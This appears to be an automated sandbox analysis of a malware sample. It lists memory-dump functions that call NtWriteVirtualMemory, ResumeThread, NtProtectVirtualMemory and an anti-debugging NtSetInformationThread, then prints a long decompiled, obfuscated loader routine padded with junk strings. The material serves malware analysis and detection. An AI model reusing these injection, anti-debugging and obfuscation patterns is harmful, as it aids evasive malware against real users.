                                  Uniqueness Score: -1.00%

                                  Function 022D3CD7, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: fdbdff566562bb634db0ad5023584d43e0104a20482af3b49e99abf7b27dde7c
                                  • Instruction ID: ae80c797b59f002ccfb88339684bd87eb38c2db73da48b3a5c796c07c4ba1cc2
                                  • Opcode Fuzzy Hash: fdbdff566562bb634db0ad5023584d43e0104a20482af3b49e99abf7b27dde7c
                                  • Instruction Fuzzy Hash: 6721257822020AAFEF259EB4CD94BE93763FF08354F444165FD8596188D7B598D1CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D974B, Relevance: 1.6, APIs: 1, Instructions: 79nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 453f62a2d259bf49393274a0c7deff00a4a8c763d62867b6ad0b1ec6beaba3f4
                                  • Instruction ID: 66f4602e90cb18c0cdf49836a5aa6f19b347d65675933fa5b4f339d9d133bde8
                                  • Opcode Fuzzy Hash: 453f62a2d259bf49393274a0c7deff00a4a8c763d62867b6ad0b1ec6beaba3f4
                                  • Instruction Fuzzy Hash: 9E219F33639213DEEB356ED484A83F53361AB15364F995256F8529B0ECC7F988C0C682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D977B, Relevance: 1.6, APIs: 1, Instructions: 77nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 17924d5f56b2ebb2aafa8bdf2f2b19ec5af7b593ab2c2e131011a43d9adaada0
                                  • Instruction ID: a7d5a2bfd1565fef4f8c29efb97b363ff2e9995bd4e2fb367d36cb5d7e48caf8
                                  • Opcode Fuzzy Hash: 17924d5f56b2ebb2aafa8bdf2f2b19ec5af7b593ab2c2e131011a43d9adaada0
                                  • Instruction Fuzzy Hash: 0B21A133639217DEEB346ED484A83F53361AB15364F891256F8529B0ECC7F948C0C682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D97B0, Relevance: 1.6, APIs: 1, Instructions: 73nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 903f86bb6ff0fb589f9a8793caefea4093642f38c5f71a9934deb10278d4cdec
                                  • Instruction ID: 659d0c1cc91c1016a95f0c148b671b3d30013083aa06eb9076eb0d82387b766a
                                  • Opcode Fuzzy Hash: 903f86bb6ff0fb589f9a8793caefea4093642f38c5f71a9934deb10278d4cdec
                                  • Instruction Fuzzy Hash: 9721AF33639153DEEF346ED480A83F53361AB153A4F895156F8429B0ACC7F948C0C682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D983B, Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 759cc77546a0d7dc70913c95e6ec5f1108a95287c4936addb0e0d0ed6055337d
                                  • Instruction ID: dacecf218bf98425b580d64fd0b87af2c46d07b4547cf5a4e62c78f74a18b151
                                  • Opcode Fuzzy Hash: 759cc77546a0d7dc70913c95e6ec5f1108a95287c4936addb0e0d0ed6055337d
                                  • Instruction Fuzzy Hash: D501B533B39153DEEE357DD481A53F533655B163A4F890196F8439B1AC87E948C0C682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0953, Relevance: 1.6, APIs: 1, Instructions: 55nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID:
                                  • API String ID: 543350213-0
                                  • Opcode ID: 2f6f8690ed6f5fc9a9d40b92df37f493fd43b2d6f82dae361e2aa89e97255887
                                  • Instruction ID: ce7fd44e683e2c02eb3fe0df50b1019ca51d546425da87a023597bd586a80706
                                  • Opcode Fuzzy Hash: 2f6f8690ed6f5fc9a9d40b92df37f493fd43b2d6f82dae361e2aa89e97255887
                                  • Instruction Fuzzy Hash: 860170B427431696FF205EE48CA17EF26545F04794F400225FD9A9B2DCD7A4C941C592
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3D87, Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: a1fb223bc0c7e82fff484222cc3275356756decd3abe5e8b4c3243408ad8dd7b
                                  • Instruction ID: 2095a1b314eb26dda9020be1d2bbedf49484618e17b3bdf79f61a63501bbfb43
                                  • Opcode Fuzzy Hash: a1fb223bc0c7e82fff484222cc3275356756decd3abe5e8b4c3243408ad8dd7b
                                  • Instruction Fuzzy Hash: 7F11C4B422020AAFDF655EB0DD94BE93B62FF04394F444155EE8596188D3B294E1DF43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D98B4, Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: cadece1fe76617df3e519e155876d7ea470f6ee1b1107e2655b40c74a051ffe8
                                  • Instruction ID: f99e58ebfbdd063e78b080c48e5010f7e82ceb828ec217ec7a7a31fca32389b4
                                  • Opcode Fuzzy Hash: cadece1fe76617df3e519e155876d7ea470f6ee1b1107e2655b40c74a051ffe8
                                  • Instruction Fuzzy Hash: 660186337391538DAE357DD481E53F52365592A3A4F990152F843AB17C87E908C0C281
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D99AF, Relevance: 1.5, APIs: 1, Instructions: 28nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 56963656261b8a67db26190740204ae9eee9e45167a9fccda13fa77800ae9e9a
                                  • Instruction ID: 6e9de669ac397cd045f3d6c799e0649dd4b0203b2ae54847fbd9953eee8d6a55
                                  • Opcode Fuzzy Hash: 56963656261b8a67db26190740204ae9eee9e45167a9fccda13fa77800ae9e9a
                                  • Instruction Fuzzy Hash: 62E026335391139A6E2DB9E8C5B63F921768C5A3C4A9A0105FC836B42C4AA904C0C6C0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D8E42, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022D8852,00000040,022D090E,00000000,00000000,00000000,00000000,?,00000000,00000000,3E17ADE6), ref: 022D8E5E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 30a613868d0bd6329ea1e76ec9f4c24f4be7a63365a4af69ebc7695101bc950d
                                  • Instruction ID: d7d733fb72f2a692c9abc50265fbc0c1a54f3ad8decb9a692466b5017dd0f1dd
                                  • Opcode Fuzzy Hash: 30a613868d0bd6329ea1e76ec9f4c24f4be7a63365a4af69ebc7695101bc950d
                                  • Instruction Fuzzy Hash: 96C012E01140002E74048928CD44C27726AC6D4738B10C31CB871626CCC530DC044031
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D562F, Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.NTDLL(022D1844,00000000,00000000,00000000,00000000,0000003F,00000307,?,022D482A,?,?,00000004,?,000000FF,00000007), ref: 022D5653
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4c70d09dbbb0857112a349d8064d2ed4e71596f79725f917e22a560188252685
                                  • Instruction ID: f22099a901d0ca944ad02c6249d116fac433eda9468218046248a5202334b450
                                  • Opcode Fuzzy Hash: 4c70d09dbbb0857112a349d8064d2ed4e71596f79725f917e22a560188252685
                                  • Instruction Fuzzy Hash: 5AD022311693C20AC302BF3008AAA133FA04B91151B9CC0CA90800A16F8A20A636E3C1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EAC4, Relevance: 155.1, APIs: 50, Strings: 38, Instructions: 1080COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0040EAC4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				short _v36;
				long long _v44;
				long long _v52;
				short _v56;
				short _v60;
				short _v64;
				char _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				long long _v88;
				short _v92;
				intOrPtr _v96;
				char _v100;
				short _v104;
				intOrPtr _v108;
				char _v112;
				long long _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				char _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _t582;
				signed int _t587;
				signed int _t600;
				signed int _t619;
				signed int _t627;
				signed int _t647;
				signed int _t664;
				signed int _t673;
				signed int _t684;
				signed int _t721;
				signed int _t738;
				signed int _t746;
				signed int _t751;
				signed int _t769;
				signed int _t773;
				signed int _t797;
				signed int _t804;
				signed int _t812;
				signed int _t817;
				signed int _t827;
				signed int _t834;
				signed int _t837;
				void* _t841;
				char* _t853;
				char* _t855;
				char* _t856;
				char* _t858;
				char* _t859;
				char* _t862;
				void* _t881;
				void* _t883;
				intOrPtr _t884;
				void* _t885;
				void* _t886;
				long long* _t887;
				long long* _t888;
				long long* _t889;

				_t884 = _t883 - 0xc;
				 *[fs:0x0] = _t884;
				L004014F0();
				_v16 = _t884;
				_v12 = 0x401268;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, _t881);
				if( *0x41333c != 0) {
					_v208 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x402774);
					L004016B8();
					_v208 = 0x41333c;
				}
				_t12 =  &_v208; // 0x41333c
				_v184 =  *((intOrPtr*)( *_t12));
				_t582 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v132);
				asm("fclex");
				_v188 = _t582;
				if(_v188 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x402764);
					_push(_v184);
					_push(_v188);
					L004016B2();
					_v212 = _t582;
				}
				_v192 = _v132;
				_t587 =  *((intOrPtr*)( *_v192 + 0x78))(_v192,  &_v136);
				asm("fclex");
				_v196 = _t587;
				if(_v196 >= 0) {
					_v216 = _v216 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x402784);
					_push(_v192);
					_push(_v196);
					L004016B2();
					_v216 = _t587;
				}
				_v36 = _v136;
				L004016AC();
				_v160 =  *0x401264;
				_v156 =  *0x401260;
				_v172 =  *0x401258;
				_v72 =  *0x401254;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x937, 0x1c4a,  &_v172,  &_v156, 0x1ea6f2,  &_v132, 0x3fc073,  &_v160,  &_v164);
				_v72 = _v164;
				_v140 = 0x23bb;
				_v136 = 0x4c55;
				_t600 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v136,  &_v140);
				_v184 = _t600;
				if(_v184 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v220 = _t600;
				}
				_v140 = 0x4a54;
				L004016A6();
				L004016A6();
				_v172 = 0x20a09d70;
				_v168 = 0x5afe;
				_v136 = 0xdbf;
				_v156 =  *0x401250;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v156,  &_v136,  &_v172,  &_v124, 0x6a5f8a,  &_v128,  &_v140, L"nonleaded");
				L004016A0();
				_t885 = _t884 + 0xc;
				_v160 =  *0x40124c;
				_v140 = 0x3cfc;
				_v136 = 0x4fc;
				_v156 =  *0x401248;
				_t619 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v156,  &_v136,  &_v140, 0x5930, 0x632350f0, 0x5afb,  &_v160, 0x6faf64,  &_v164, 2,  &_v124,  &_v128);
				_v184 = _t619;
				if(_v184 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v224 = _t619;
				}
				_v68 = _v164;
				_v136 = 0xa93;
				_v160 =  *0x401244;
				_v156 =  *0x401240;
				_t627 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x4319,  &_v156,  &_v160,  &_v136, 0x534262, L"COORDINATORY", 0xafdb4ec0, 0x5af6,  &_v172);
				_v184 = _t627;
				if(_v184 >= 0) {
					_v228 = _v228 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v228 = _t627;
				}
				_v100 = _v172;
				_v96 = _v168;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4);
				_v172 = 0xb73d9430;
				_v168 = 0x5afa;
				_v156 = 0x71b51e;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4,  &_v156, 0x646b, L"Rapportopgaveer",  &_v172,  &_v136);
				_v64 = _v136;
				_v156 = 0x19a9ec;
				_v136 = 0x74b1;
				L004016A6();
				_v172 =  *0x401238;
				_t647 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, L"UDSENDELSESLEDERENS", L"Princesslike2",  &_v172, 0x75993920, 0x5b05,  &_v124, 0x7965ca,  &_v136, 0x6c83,  &_v156,  &_v180);
				_v184 = _t647;
				if(_v184 >= 0) {
					_v232 = _v232 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v232 = _t647;
				}
				_v32 = _v180;
				_v28 = _v176;
				L0040169A();
				L004016A6();
				_v136 = 0x7f6;
				_v160 = 0x85e0a5;
				L004016A6();
				_v156 = 0x81e999;
				 *((intOrPtr*)( *_a4 + 0x758))(_a4, 0x5b262c,  &_v156, 0x4de434a0, 0x5b07,  &_v124, L"Ciceronically",  &_v160,  &_v136,  &_v128,  &_v140);
				_v76 = _v140;
				L004016A0();
				_t886 = _t885 + 0xc;
				_t664 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 2,  &_v124,  &_v128);
				_v184 = _t664;
				if(_v184 >= 0) {
					_v236 = _v236 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v236 = _t664;
				}
				_v152 = 0x2e49;
				_v172 =  *0x401230;
				_v148 = 0x47eb;
				_v144 = 0x4944;
				_v140 = 0x4cd7;
				_v136 = 0x72a9;
				_t673 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v136, 0x20ce,  &_v140,  &_v144, 0x16c328,  &_v148,  &_v172,  &_v152);
				_v184 = _t673;
				if(_v184 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v240 = _t673;
				}
				_v136 = 0x58da;
				 *((intOrPtr*)( *_a4 + 0x75c))(_a4, L"brysthulernes",  &_v136,  &_v140);
				_v92 = _v140;
				L004016A6();
				L004016A6();
				_t684 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v124, 0x1ea6f2,  &_v128);
				_v184 = _t684;
				if(_v184 >= 0) {
					_v244 = _v244 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v244 = _t684;
				}
				L004016A0();
				_t887 = _t886 + 0xc;
				L004016A6();
				_v160 = 0x4c041c;
				_v172 = 0x950d78b0;
				_v168 = 0x5af7;
				_t853 =  &_v124;
				L004016A6();
				_v156 = 0x6b48d8;
				 *_t887 =  *0x401228;
				 *_t887 =  *0x401220;
				 *((intOrPtr*)( *_a4 + 0x760))(_a4, _t853, _t853,  &_v156,  &_v124, _t853, _t853,  &_v172,  &_v160, 0x2df651, 0x6ba0, 0x106f,  &_v128, 2,  &_v124,  &_v128);
				L004016A0();
				_t888 = _t887 + 0xc;
				_v156 = 0x4bf5be;
				L004016A6();
				_t855 =  &_v124;
				L004016A6();
				_v172 = 0x7df0fff0;
				_v168 = 0x5afa;
				 *_t888 =  *0x401218;
				 *((intOrPtr*)( *_a4 + 0x764))(_a4, 0x55d653,  &_v172, 0x5d62, 0x329d,  &_v124, _t855, _t855,  &_v128, L"Neapolitanernes9", L"Femaaret1",  &_v156, 2,  &_v124,  &_v128);
				L004016A0();
				_t889 = _t888 + 0xc;
				_v144 = 0x6589;
				_v140 = 0x592a;
				_v136 = 0xc7f;
				_v172 = 0xcd64b2a0;
				_v168 = 0x5b06;
				 *_t889 =  *0x401210;
				 *_t889 =  *0x401208;
				 *((intOrPtr*)( *_a4 + 0x768))(_a4, 0x703d9a,  &_v172,  &_v136, 0x25b41f,  &_v140, _t855, _t855,  &_v144, _t855, L"BREGNEMOS",  &_v148, 2,  &_v124,  &_v128);
				_v60 = _v148;
				_v160 =  *0x401200;
				_v172 =  *0x4011f8;
				_v156 = 0x498bfd;
				_t721 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v156, L"MARMENNILL",  &_v172, 0x3fdd2e,  &_v160,  &_v180);
				_v184 = _t721;
				if(_v184 >= 0) {
					_v248 = _v248 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v248 = _t721;
				}
				_v112 = _v180;
				_v108 = _v176;
				_v160 =  *0x4011f0;
				_v136 = 0x668f;
				_v156 = 0x61043c;
				_v180 = 0x31a5ae00;
				_v176 = 0x5afc;
				_v172 = 0x85536c70;
				_v168 = 0x5afe;
				 *_t889 =  *0x4011e8;
				 *((intOrPtr*)( *_a4 + 0x76c))(_a4,  &_v172, _t855, _t855,  &_v180, 0x278f,  &_v156, 0x8a7d0750, 0x5aff,  &_v136,  &_v160, 0x4691,  &_v140);
				_v56 = _v140;
				_v156 =  *0x4011e0;
				_t738 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v156, 0x64817a,  &_v172);
				_v184 = _t738;
				if(_v184 >= 0) {
					_v252 = _v252 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v252 = _t738;
				}
				_v52 = _v172;
				_v160 = 0x4186f1;
				_v144 = 0x7308;
				_v140 = 0x3cf0;
				_v156 = 0x80397e;
				_v136 = 0x67df;
				 *_t889 =  *0x4011d8;
				_t746 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, L"STRUKTURELLES", _t855, _t855,  &_v136, 0x7c54d2,  &_v156,  &_v140, 0x4d1ba3,  &_v144, 0x22e85140, 0x5b03,  &_v160);
				_v184 = _t746;
				if(_v184 >= 0) {
					_v256 = _v256 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v256 = _t746;
				}
				_v156 =  *0x4011d4;
				 *_t889 =  *0x4011d0;
				_t751 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x8a636, L"Unimputed7", _t855,  &_v156,  &_v172);
				_v184 = _t751;
				if(_v184 >= 0) {
					_v260 = _v260 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v260 = _t751;
				}
				_v88 = _v172;
				_v172 =  *0x4011c8;
				_v156 = 0x3f4761;
				 *_t889 =  *0x4011c0;
				_t377 =  &_v156; // 0x3f4761
				 *_t889 =  *0x4011b8;
				 *((intOrPtr*)( *_a4 + 0x770))(_a4, 0x4855a1f0, 0x5afc, _t855, _t855, _t377, _t855,  &_v172,  &_v180);
				_v120 = _v180;
				_v160 = 0x161041;
				_v136 = 0x5ce9;
				_v172 = 0x7df0fff0;
				_v168 = 0x5afa;
				_v156 =  *0x4011b0;
				 *_t889 =  *0x401218;
				_t391 =  &_v156; // 0x3f4761
				 *((intOrPtr*)( *_a4 + 0x774))(_a4, _t391, _t855, _t855,  &_v172,  &_v136, 0x65f8fe, 0x26ce, 0x1837,  &_v160);
				_v172 =  *0x4011a8;
				_v156 = 0x61246;
				_t769 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v156, L"mindedigtet",  &_v172);
				_v184 = _t769;
				if(_v184 >= 0) {
					_v264 = _v264 & 0x00000000;
				} else {
					_push(0x724);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v264 = _t769;
				}
				_t773 =  *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v136);
				_v184 = _t773;
				if(_v184 >= 0) {
					_v268 = _v268 & 0x00000000;
				} else {
					_push(0x728);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v268 = _t773;
				}
				_v104 = _v136;
				 *((intOrPtr*)( *_a4 + 0x778))(_a4);
				_v136 = 0x6da8;
				_t856 =  &_v124;
				L004016A6();
				_v156 = 0x2cc3e3;
				 *_t889 =  *0x4011a0;
				 *_t889 =  *0x401198;
				 *((intOrPtr*)( *_a4 + 0x77c))(_a4,  &_v156, _t856, _t856,  &_v124, _t856,  &_v136);
				L0040169A();
				_v136 = 0xb3e;
				 *((intOrPtr*)( *_a4 + 0x780))(_a4, 0x4ff843, L"ACROMIOCLAVICULAR",  &_v136, 0x6800);
				_v160 =  *0x401190;
				_t858 =  &_v124;
				L004016A6();
				_v180 =  *0x401188;
				_v156 =  *0x401184;
				_v172 = 0xb7b19540;
				_v168 = 0x5b06;
				_v136 = 0x435;
				 *_t889 =  *0x401180;
				 *_t889 =  *0x401178;
				_t797 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v136,  &_v172,  &_v156, 0xb598d620, 0x5b00,  &_v180, _t858, _t858,  &_v124, _t858,  &_v160,  &_v164);
				_v184 = _t797;
				if(_v184 >= 0) {
					_v272 = _v272 & 0x00000000;
				} else {
					_push(0x72c);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v272 = _t797;
				}
				_v80 = _v164;
				_t859 =  &_v124;
				L0040169A();
				 *((intOrPtr*)( *_a4 + 0x784))(_a4);
				_t804 =  *((intOrPtr*)( *_a4 + 0x730))(_a4);
				_v184 = _t804;
				if(_v184 >= 0) {
					_v276 = _v276 & 0x00000000;
				} else {
					_push(0x730);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v276 = _t804;
				}
				 *_t889 =  *0x401174;
				 *((intOrPtr*)( *_a4 + 0x788))(_a4, _t859, 0x5d86fe);
				_v156 =  *0x401170;
				_v136 = 0x61ea;
				_t812 =  *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v136,  &_v156, 0x60a7, 0x183aac);
				_v184 = _t812;
				if(_v184 >= 0) {
					_v280 = _v280 & 0x00000000;
				} else {
					_push(0x734);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v280 = _t812;
				}
				_v136 = 0x48e2;
				L004016A6();
				_t817 =  *((intOrPtr*)( *_a4 + 0x738))(_a4, L"UNGDOMSFNGSELS",  &_v124, 0x6da9aa, 0x1b6865, 0x81a23630, 0x5afc, 0x737aa,  &_v136);
				_v184 = _t817;
				if(_v184 >= 0) {
					_v284 = _v284 & 0x00000000;
				} else {
					_push(0x738);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v284 = _t817;
				}
				L0040169A();
				_v156 =  *0x4011f0;
				 *((intOrPtr*)( *_a4 + 0x78c))(_a4,  &_v156, 0x61043c,  &_v172);
				_v44 = _v172;
				_v136 = 0x4ecb;
				_v172 =  *0x401168;
				 *_t889 =  *0x401160;
				_t827 =  *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v124, 0xfedb0060, 0x5af6, 0x64e5,  &_v136, 0x22ad);
				_v184 = _t827;
				if(_v184 >= 0) {
					_v288 = _v288 & 0x00000000;
				} else {
					_push(0x73c);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v288 = _t827;
				}
				_t862 =  &_v124;
				L004016A6();
				_v136 = 0x214d;
				_v156 = 0x665416;
				_v172 =  *0x401158;
				 *_t889 =  *0x401150;
				 *_t889 =  *0x401148;
				_t834 =  *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v172,  &_v156, _t862, _t862,  &_v136, _t862, _t862,  &_v124, 0x3b8b);
				_v184 = _t834;
				if(_v184 >= 0) {
					_v292 = _v292 & 0x00000000;
				} else {
					_push(0x740);
					_push(0x40259c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v292 = _t834;
				}
				L0040169A();
				_t837 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v184 = _t837;
				if(_v184 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x40256c);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v296 = _t837;
				}
				_t841 =  *((intOrPtr*)( *_a4 + 0x790))(_a4,  &_v156);
				_v8 = 0;
				asm("wait");
				_push(0x40fd69);
				return _t841;
			}









































































































                                  0x0040eac7
                                  0x0040ead6
                                  0x0040eae2
                                  0x0040eaea
                                  0x0040eaed
                                  0x0040eafa
                                  0x0040eb02
                                  0x0040eb0d
                                  0x0040eb17
                                  0x0040eb34
                                  0x0040eb19
                                  0x0040eb19
                                  0x0040eb1e
                                  0x0040eb23
                                  0x0040eb28
                                  0x0040eb28
                                  0x0040eb3e
                                  0x0040eb46
                                  0x0040eb5e
                                  0x0040eb61
                                  0x0040eb63
                                  0x0040eb70
                                  0x0040eb92
                                  0x0040eb72
                                  0x0040eb72
                                  0x0040eb74
                                  0x0040eb79
                                  0x0040eb7f
                                  0x0040eb85
                                  0x0040eb8a
                                  0x0040eb8a
                                  0x0040eb9c
                                  0x0040ebb7
                                  0x0040ebba
                                  0x0040ebbc
                                  0x0040ebc9
                                  0x0040ebeb
                                  0x0040ebcb
                                  0x0040ebcb
                                  0x0040ebcd
                                  0x0040ebd2
                                  0x0040ebd8
                                  0x0040ebde
                                  0x0040ebe3
                                  0x0040ebe3
                                  0x0040ebf9
                                  0x0040ec00
                                  0x0040ec0b
                                  0x0040ec17
